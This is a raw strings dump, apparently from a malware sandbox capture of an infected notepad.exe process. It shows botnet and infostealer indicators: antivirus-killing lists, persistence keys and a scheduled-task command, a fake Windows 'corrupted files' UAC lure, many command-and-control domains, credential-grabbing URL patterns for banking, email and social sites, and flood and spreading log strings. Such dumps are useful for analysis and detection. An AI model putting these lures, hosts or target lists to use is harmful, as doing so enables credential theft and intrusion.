Opera/9.00 (Windows NT 5.1; U; en)Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)Opera 9.4 (Windows NT 6.1; U; en)Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)SbieDll.dllSoftware\Classes\CLSID\%s\XSoftware\Classes\CLSID\%s\X\%s0xXSB:0xXG:%s_0xX_%c:%s_v1$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%uIEXPLORE.EXEIE.HTTPSOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoiceIE.HTTPSSOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoiceSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoiceSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoiceIE.AssocFile.HTMHTTP\shell\open\commandSoftware\Microsoft\Windows\CurrentVersion\Ext\Settings\%sPsapi.dll%s\%sSoftware\Adobe\Acrobat Reader\%s\Privilegedmscoree.dllHARDWARE\DESCRIPTION\System\CentralProcessor\%uSOFTWARE\Microsoft\Windows NT\CurrentVersionnspr4.dllnss3.dllUrlmon.dllURLDownloadToFileWNetapi32.dll76487-640-1457236-2383776487-337-8429955-2261476487-644-3177037-2351076497-640-6308873-2383555274-640-2673064-2395076487-640-8834005-2319576487-640-0716662-2353576487-644-8648466-2310600426-293-8170032-8514676487-341-5883812-22420SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ExplorerSOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}snxhk.dllcomctl32.dllZwSetValueKeyZwDeleteValueKeySOFTWARE\%supdate.microsoft.commicrosoft.comwindowsupdate.microsoft.comJOINPRIVMSG.rdatacmd_option.%s/c %scmd.exemsvcrt.dll--x-x-x-xxContent-Type: multipart/form-data; boundary=x-x-x-xxContent-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"%s?action=up&g=%sxul.dllContent-Type: application/x-www-form-urlencodedHTTP/1.1?pid=%d?page=%d?id=%u%s=%u&%s=%s%s=%s&%s=%u&%s=%s&%s%u=&%s%hu=&%s=_%u%d|%s|%s|%s.infohttpgetGET /%s HTTP/1.1Host: %sContent-Length: %dAccept: %sAccept-Language: %sAccept-Charset: %sAccept-Encoding: %sUser-Agent: %sReferer: %sConnection: %shttp://iexplore.exefirefox.exetbb-firefox.exe%s:%huwindowsupdateSSH2_MSG_KEXINITSSH2_MSG_DISCONNECTSSH2_MSG_USERAUTH_SUCCESShttp://%s%s/image.php?id=%sTaskDialogIndirecthttp://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535ÐxXntdll.dllkernel32.dllsecur32.dllcrypt32.dlluser32.dlladvapi32.dllwininet.dllshell32.dllshlwapi.dllole32.dllversion.dllsfc.dlldnsapi.dllws2_32.dll8"808]9|99%9 919<9=(=/=6==={=4 4?4^4}46o6g6r6w69 9$9(90949.text`.rdata@.data.rsrcThis pointer, %d, is aligned on %dThis pointer, %d, is not aligned on %d%f, %f and %f form a right-angled triangle.Invalid parameter passed to C runtime function.?#%X.y%S#[kPlease contact the application's support team for more information.- Attempt to initialize the CRT more than once.- CRT not initialized- floating point support not loadedGetProcessWindowStationUSER32.DLLShellExecuteASHELL32.dllGetCPInfoGetWindowsDirectoryACreatePipeGetWindowsDirectoryWGetConsoleOutputCPKERNEL32.dll.VI3xqrzcÁUdp?iw0/#"%fP.oUwB%Su[Rkka.by.dYi'p.Cvq.EU{%D ;0.Bx%s)$Oi.zC:*@7WeBld0%Fr. -.kN.kal"f.xKKSoftware\Classes\CLSID\%SG:%S_0xXchrome.exeopera.exesafari.exemaxthon.exe:Mozilla\Firefox\Profilescookies.sqlite%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*%s\winsxs\%s\comctl32.dllSYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s%s:*:Enabledavcuf32.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Runprstrui.exeWindows DefenderMpClient.dllWindows Defender\MSASCui.exeMpSvc.dllmsseces.exeMsMpEng.exeMSASCui.exeMpAsDesc.dllMsMpLics.dllavgui.exeavgidsagent.exeavgwdsvc.exeavgdiagex.exeavgmfapx.exeavgupd.exeavgcfgex.exeavgnt.exeavguard.exeavshadow.exeavcenter.exeupdate.dllupdaterc.dllusrreq.execcsvchst.exesymerr.exeNIS.exeNAV.exenavw32.exeavastui.exeAvastEmUpdate.exeashUpd.exeWRSA.exezatray.exeForceField.exeupdating.dllfshoster32.exefsaua.dllPSUNMain.exePSUAService.exePSANHost.exePSUNScan.dllepavjobs.exeAVENGINE.exeUpgrader.exeadaware.exeBullGuard.exe.manifestBullGuardUpdate.exeBullGuard.exeBullGuardScanner.exeBullGuardBhvScanner.exeBullGuardUpdate2.exeBgScan.exeBgScanEngine.dll.manifestupdater.exeBackup\RSD\RSSetup\updater.exeRsTray.exeRavMonD.exeRsMgrSvc.exersmain.exeRsScan.dllRsTray.dllmbamgui.exembam.exepctsGui.exepctsAuxs.exepctsSvc.exeUpdate.exeUpdateHlpr.dllDefinitions\vcore.dllsbamui.exeSBAMTray.exeupdater_client_mod.dllFProtTray.exeFPWin.exescf.datALUpdate.exeupdate_tmp.exearcaclean.exeBavUpdater.exercfp.exeCLPSLA.exeop_mon.exeniu.exeK7TSUpdT.exesguardxup.execcupdate.execaupdate.dlla2guard.exea2start.exea2service.exeAVKTray.exeGDSC.exeAVK.exeGDFirewallTray.exeBka.exeBLuPro.exeBkavSystemServer.exeBkavService.exeLiveUpdate.dllLiveConnect.dllBaseFile\Bkav\LiveUpdate.dllV3Lite.exeASDSvc.exeautoup.exedownloader.exe%s.configupdatesrv.exeupdatemgr.dllegui.exeekrn.exex86\ekrn.exeuWinMgr.execoreServiceShell.exeuiSeAgnt.exeuiWatchDog.exeplugins\plugUpdater.dllUiFrmwrk\uiUpdateTray.execoreFrameworkHost.exemcagent.exeMcSvHost.exeMcUICnt.exeMcPvTray.exemcui_exemcpltui_exemcshell.exemcupdmgr.exemcupdate.exemcshield.exemcupdui.dllMcAPExe.exe.configImage File Execution Options\%sSYSTEM\CurrentControlSet\services\%s%c:\ntusbdriver.sys%c:\*p.exe%c:\%sp.exe%WinDir%\explorer.exe/C start /d. %s&"%s"%COMSPEC%%WinDir%\system32\shell32.dll%c:\%s.lnkVisthAux.exeexplorer.exet.minecraftWorks! PID: %d, Name: %scmdvirth%s%s\Xtcp://svchost.execsrss.exelsass.exesmss.exewscript.execscript.exevbc.exerundll32.exeregsvr32.exeSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Runwinlogon.exeservices.exe%s\x.lnkSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%sdesktop.iniSOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceSOFTWARE\Microsoft\Windows NT\CurrentVersion\Windowswintrust.dllchrome.dllApplications\iexplore.exe\shell\open\command%s_xxx.zipNavw32.exeSysInspector.exeavscan.exemfefire.exewuauclt.exeWerFault.exelFileZilla\sitemanager.xmlportSites.datQuick.dat%s\3\%s%s\4\%sspoolsv.exesteam.exeskype.exeorigin.exedwm.exetapi3.dll/C copy "%s" "%s"SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunWindows Update Service"%s" /%sSoftware\Microsoft\Windows\CurrentVersion\RunOnce/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHESTschtasks.exe/DELETE /TN "Windows Update Check - 0xX" /F\Windows\Explorer.exeLow_X%s.manifestPendingFileRenameOperations%s\XWindows\CurrentVersion\RunCurrentVersion\WindowsWindows NT\CurrentVersion\Image File Execution Options\%sWindows has encountered a corrupted folder on your hard driveMultiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.Corrupted folder: %sCorrupted file count: %d%s/c start "" "%s" /%s "%s"shell32,ShellExec_RunDLL "%s" /%s "%s"You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.Windows 3.1 Update Service%s:Zone.Identifier%s\X.pifKERNEL32.DLLKERNELBASE.DLLkernelbase.dlloSome operation could not be performed because the system is out of resources. Close some windows and try again.Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.2Software\Microsoft\Windows\CurrentVersion\ExplorerUThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.Description: BThe "Portable Network Graphics" image contains an invalid palette.The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.This "Portable Network Graphics" image is not supported because either its width or height exceeds the maximum size of 65535 pixels.There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.)Class '%s' is already registered for '%s'%Class '%s' is not registered for '%s'%s parameter cannot be nil#Feature not supported by this styleStyle '%s' is not registered"Cannot unregister the system styleOLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parametersFailed to Save StreamjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corruptedLogin"%s" is an invalid pathÊnnot remove shell notification icon"%s requires Windows Vista or laterButton%dRadioButton%dUnable to load style '%s'Unable to load styles: %sStyle '%s' already registered#Style class '%s' already registeredStyle '%s' not foundStyle class '%s' not foundAll Clipboard does not support IconsCannot open clipboard: %sText exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.7Length of value array must be >= length of prompt array&PasswordValue must be between %d and %d%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parentError creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'%s property out of rangeGNo single cast observer with ID %d was added to the observer collectionFNo multi cast observer with ID %d was added to the observer collectionScan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)Unsupported clipboard formatCanvas does not allow drawing#Text format flag '%s' not supportedWindows Server 2003Windows Server 2003 R2Windows Server 2012Windows 8Error writing zip file"Invalid Zip Local Header signature$Invalid Zip Central Header signature1Support for compression method not registered: %sObserver is not supportedLCannot have multiple single cast observers added to the observers collection4The object does not implement the observer interface5Insufficient RTTI available to support this operationParameter count mismatch WindowsWindows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 2000Windows XPTimespan too longbThe duration cannot be returned because the absolute value exceeds the value of TTimeSpan.MaxValueNo help found for context %dNo help found for %sParameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %dThe specified path is too long The specified path was not found The path format is not supportedThe drive cannot be found The specified file was not foundWThe given "%s" local time is invalid (situated within the missing period prior to DST).$No help viewer that supports filtersInvalid Timeout value: %sFailed to create key %sFailed to get data for '%s'Failed to set data for '%s'Resource %s not found%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration groupProperty %s does not existThread creation error: %sThread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created threadUnable to write to %sInvalid file name - %s'%s' is an invalid mask at (%d)$''%s'' is not a valid component nameInvalid data type for '%s' List capacity out of bounds (%d)List count out of bounds (%d)List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM classError reading %s%s%s: %sInvalid count (%d)Invalid destination index (%d)Ancestor for '%s' not foundCannot assign a %s to a %sBits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main threadClass %s not foundA class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicatesCannot create file "%s". %sCannot open file "%s". %sInvalid destination array"Character index out of bounds (%d)Start index out of bounds (%d)%s (%s, line %d)Abstract Error?Access violation at address %p in module '%s'. %s of address %pSystem Error. Code: %d.2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)Operation not supportedExternal exception %xInterface not supportedObject lock not owned(Monitor support function not initializedApplication Error1Format '%s' invalid or incompatible with argumentNo argument for format '%s'"Variant method calls not supportedInvalid variant operationInvalid NULL variant operation%Invalid variant operation (%s%.8x)%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usableInteger overflow Invalid floating point operationInvalid pointer operationInvalid class typecast0Access violation at address %p. %s of address %pPrivileged instruction(Exception %s in module %s at %p.!'%s' is not a valid integer value('%s' is not a valid floating point value '%s' is not a valid date'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp'%s' is not a valid GUID valueI/O error %dnotepad.exe_1520_rwx_000A0000_00029000:
.text`.data.rsrc@.reloc*windows defender**windowsupdate**drweb*dwwin.exekernel32.dlliphlpapi.dllGetExtendedTcpTableGetOwnerModuleFromTcpEntry%systemroot%%programfiles%\Common Files\*\*.exe%appdata%\Identities\*.exe%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exeole32.dll/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe%SystemRoot%\system32\SHELL32.dll%s\c731200%s\%s%s\%s.lnkWindows_Shared_Mutex_231_c000100ntdll.dll\ScreenSaverPro.scr\temp.binuser32.dlladvapi32.dllshell32.dllurlmon.dllwininet.dllgdi32.dllrpcrt4.dllnetapi32.dll*.exe.gonewiththewings*.gonewiththewingsWinExecURLDownloadToFileAhttp://www.google.com\calc.exe\Reader_sl.exeSOFTWARE\Microsoft\Windows\CurrentVersion\Runnotepad.exe\notepad.exe\svchost.exeWindowsIdIdentities\%s%s\%s\%s.exe:Zone.Identifier.quarantined"%s" -shell"%s" -binduserinit.exeexplorer.exeWindows critical error, require rebootWindows UpdateSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Systema.aiphon1egalaxyblack42.coma.ajjjqws1fkxx42.coma.adoyou1understandme42.coma.amous1epadsafa42.coma.acaraka1lagroup42.coma.aire1bobohayawen42.coma.ajhvdqw1ladies42.coma.biphon2egalaxyblack42.coma.bmous2epadsafa42.coma.bcaraka2lagroup42.coma.anabok1hasn1aser42.coma.athemall1gonowhaha42.coma.bdoyou2understandme42.coma.bnabok2hasn1aser42.coma.bjjjqws2fkxx42.coma.bjhvdqw2ladies42.coma.bthemall2gonowhaha42.coma.bire2bobohayawen42.coma.cdoyou3understandme42.coma.cmous3epadsafa42.coma.dmous4epadsafa42.coma.ciphon3egalaxyblack42.coma.cnabok3hasn1aser42.coma.cire3bobohayawen42.coma.cthemall3gonowhaha42.coma.cjhvdqw3ladies42.coma.cjjjqws3fkxx42.coma.ccaraka3lagroup42.coma.diphon4egalaxyblack42.coma.ddoyou4understandme42.coma.dnabok4hasn1aser42.coma.dire4bobohayawen42.coma.djjjqws4fkxx42.coma.djhvdqw4ladies42.coma.dthemall4gonowhaha42.coma.edoyou5understandme42.coma.dcaraka4lagroup42.coma.emous5epadsafa42.coma.ecaraka5lagroup42.coma.eiphon5egalaxyblack42.coma.enabok5hasn1aser42.coma.eire5bobohayawen42.coma.ejjjqws5fkxx42.coma.ejhvdqw5ladies42.coma.ethemall5gonowhaha42.coma.roooggeyyy2.coma.roooggeyyy3.coma.roooggeyyy4.coma.so1aa00.coma.saao20000.comGetProcessHeapGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegOpenKeyARegEnumKeyARegCreateKeyExARegOpenKeyExAADVAPI32.dllShellExecuteExWSHELL32.dllSetTcpEntrySHLWAPI.dllRPCRT4.dllNETAPI32.dllDNSAPI.dllSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonSoftware\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunSoftware\WindowsId Manager ReaderSoftware\Microsoft\Windows\CurrentVersion\Policies\ExplorerSoftware\Microsoft\Windows\CurrentVersion\RunSoftware\Microsoft\Windows\CurrentVersion\RunOnceWindowsMarkm1xg.orgmxxtxxt.bizmeob.me%System%\notepad.exe`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0A%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%s%s_%d-%sMutex%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0httpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/s\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWURLDownloadToFileWHttpSendRequestWHttpSendRequestANtEnumerateValueKeySecur32.dllShellExecuteAHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllWS2_32.dllMSVCRT.dllConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWRegNotifyChangeKeyValuePASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc7 767<7~78*808;8~8{A5DCBF10-6530-11D2-901F-00C04FB951ED}shlwapi.dllcrypt32.dllwtsapi32.dllsamcli.dllnetutils.dlluserenv.dllWindowsSecondaryDesktop\charmap.exe\Windows Media Player\wmprph.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifiersecur32.dllws2_32.dll:%S%S\winlogon.exeAadvapi32.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Runnotepad.exe_1520_rwx_008B0000_00027000:
.text`.rdata@.data.rsrc@.relocPSSSSSShPSSVSShRPVSShPSSh(PSSh#PSSh'PSSh&PSSh*9p.uVnotepad.exe_1520_rwx_008D8000_00072000:
Opera/9.00 (Windows NT 5.1; U; en)Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)Opera 9.4 (Windows NT 6.1; U; en)Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)SbieDll.dllSoftware\Classes\CLSID\%s\XSoftware\Classes\CLSID\%s\X\%s0xXSB:0xXG:%s_0xX_%c:%s_v1$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%uIEXPLORE.EXEIE.HTTPSOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoiceIE.HTTPSSOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoiceSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoiceSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoiceIE.AssocFile.HTMHTTP\shell\open\commandSoftware\Microsoft\Windows\CurrentVersion\Ext\Settings\%sPsapi.dll%s\%sSoftware\Adobe\Acrobat Reader\%s\Privilegedmscoree.dllHARDWARE\DESCRIPTION\System\CentralProcessor\%uSOFTWARE\Microsoft\Windows NT\CurrentVersionnspr4.dllnss3.dllUrlmon.dllURLDownloadToFileWNetapi32.dll76487-640-1457236-2383776487-337-8429955-2261476487-644-3177037-2351076497-640-6308873-2383555274-640-2673064-2395076487-640-8834005-2319576487-640-0716662-2353576487-644-8648466-2310600426-293-8170032-8514676487-341-5883812-22420SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ExplorerSOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}snxhk.dllcomctl32.dllZwSetValueKeyZwDeleteValueKeySOFTWARE\%supdate.microsoft.commicrosoft.comwindowsupdate.microsoft.comJOINPRIVMSG.rdatacmd_option.%s/c %scmd.exemsvcrt.dll--x-x-x-xxContent-Type: multipart/form-data; boundary=x-x-x-xxContent-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"%s?action=up&g=%sxul.dllContent-Type: application/x-www-form-urlencodedHTTP/1.1?pid=%d?page=%d?id=%u%s=%u&%s=%s%s=%s&%s=%u&%s=%s&%s%u=&%s%hu=&%s=_%u%d|%s|%s|%s.infohttpgetGET /%s HTTP/1.1Host: %sContent-Length: %dAccept: %sAccept-Language: %sAccept-Charset: %sAccept-Encoding: %sUser-Agent: %sReferer: %sConnection: %shttp://iexplore.exefirefox.exetbb-firefox.exe%s:%huwindowsupdateSSH2_MSG_KEXINITSSH2_MSG_DISCONNECTSSH2_MSG_USERAUTH_SUCCESShttp://%s%s/image.php?id=%sTaskDialogIndirecthttp://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535ÐxXntdll.dllkernel32.dllsecur32.dllcrypt32.dlluser32.dlladvapi32.dllwininet.dllshell32.dllshlwapi.dllole32.dllversion.dllsfc.dlldnsapi.dllws2_32.dll8"808]9|99%9 919<9=(=/=6==={=4 4?4^4}46o6g6r6w69 9$9(90949.text`.rdata@.data.rsrcThis pointer, %d, is aligned on %dThis pointer, %d, is not aligned on %d%f, %f and %f form a right-angled triangle.Invalid parameter passed to C runtime function.?#%X.y%S#[kPlease contact the application's support team for more information.- Attempt to initialize the 